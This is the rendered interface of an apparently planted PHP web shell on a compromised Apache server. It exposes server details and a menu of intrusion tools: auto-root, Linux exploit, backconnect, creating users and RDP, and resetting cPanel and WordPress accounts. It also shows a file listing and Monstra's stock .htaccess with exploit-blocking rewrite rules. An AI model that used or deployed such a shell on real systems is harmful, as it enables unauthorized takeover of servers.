Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.70.179.124
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
monstra /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
update
[ DIR ]
drwxr-xr-x
.htaccess
2.17
KB
-rw-r--r--
changelog.txt
4.67
KB
-rw-r--r--
edit.php
3.53
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
182
B
-rw-r--r--
import.php
2.67
KB
-rw-r--r--
info.xml
2.09
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.72
KB
-rw-r--r--
install.xml
766
B
-rw-r--r--
md5
1.11
KB
-rw-r--r--
notes.txt
493
B
-rw-r--r--
options.table.xml
1.87
KB
-rw-r--r--
upgrade.php
3.37
KB
-rw-r--r--
upgrade.xml
485
B
-rw-r--r--
users.table.xml
528
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# # This file is part of the Monstra. # # (c) Romanenko Sergey / Awilum <awilum@msn.com> # # For the full copyright and license information, please view the LICENSE # file that was distributed with this source code. # # Set default charset utf-8 AddDefaultCharset UTF-8 # PHP 5, Apache 1 and 2. <IfModule mod_php5.c> php_flag magic_quotes_gpc off php_flag magic_quotes_sybase off php_flag register_globals off </IfModule> <IfModule mod_rewrite.c> RewriteEngine on ## Begin - Rewrite rules to block out some common exploits. # If you experience problems on your site block out the operations listed below # This attempts to block the most common type of exploit `attempts` to Monstra # # Block out any script trying to base64_encode data within the URL. RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR] # Block out any script that includes a <script> tag in URL. RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL. RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to modify a _REQUEST variable via URL. RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) # Return 403 Forbidden header and show the content of the root homepage RewriteRule .* index.php [F] # ## End - Rewrite rules to block out some common exploits. ## Begin - Rewrite rules for Monstra RewriteBase [[relativeurl]]/ RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php [QSA,L] ## End - Rewrite rules for Monstra ## Begin - Rewrite rules for SEO improvements. # RewriteCond %{HTTP_HOST} ^www.example.org [NC] # RewriteRule ^(.*)$ http://example.org/$1 [R=301,L] # Redirect 301 /index http://example.org/ ## End - Rewrite rules for SEO improvements. </IfModule> # Prevent visitors from viewing files directly. <FilesMatch "(^#.*#|\.(md|txt|html|tpl|yml|yaml)|~)$"> Order allow,deny Deny from all Satisfy All </FilesMatch> # Allow read files. <Files robots.txt> Allow from all </Files> # Don't show directory listings for URLs which map to a directory. Options -Indexes
Close